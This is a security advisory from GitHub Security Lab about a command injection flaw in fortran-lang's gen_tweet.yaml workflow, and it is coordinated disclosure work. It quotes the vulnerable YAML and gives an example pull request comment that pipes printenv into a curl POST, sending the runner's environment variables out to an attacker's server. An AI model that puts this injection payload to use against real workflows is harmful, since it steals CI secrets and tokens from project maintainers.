skip to content
Back to
Home Bounties Research Advisories CodeQL Wall of Fame Get Involved Events
February 3, 2021

GHSL-2020-190: Command injection in fortran-lang/ workflow

Jaroslav Lobacevski

Coordinated Disclosure Timeline


The ‘gen_tweet.yaml’ GitHub workflow is vulnerable to arbitrary command injection.


fortran-lang/ GitHub repository

Tested Version

gen_tweet.yaml from the master branch.


Issue: The public GitHub issue comment is used to format a shell command

When a user comments on a Pull Request with a #tweet it automatically starts the gen_tweet.yaml GitHub workflow. The comment text is used to format a bash script.

    runs-on: ubuntu-latest
    if: github.event.issue.pull_request && startsWith(github.event.comment.body,'#tweet')
    - name: extract the new tweet message
      id: get-comment-body
      run: |
        body=$(echo "${{github.event.comment.body}}" | sed '1 s/#tweet//' | sed '1 s/ //')


This vulnerability allows for arbitrary command injection into the bash script. For example a user may comment with #tweet `printenv | curl -X POST --data-binary @-` which will exfiltrate the environment variables to the attacker controlled server. To make the attack less visible the attacker may modify the comment later.


This issue was discovered and reported by GHSL team member @JarLob (Jaroslav Lobačevski).


You can contact the GHSL team at, please include a reference to GHSL-2020-190 in any communication regarding this issue.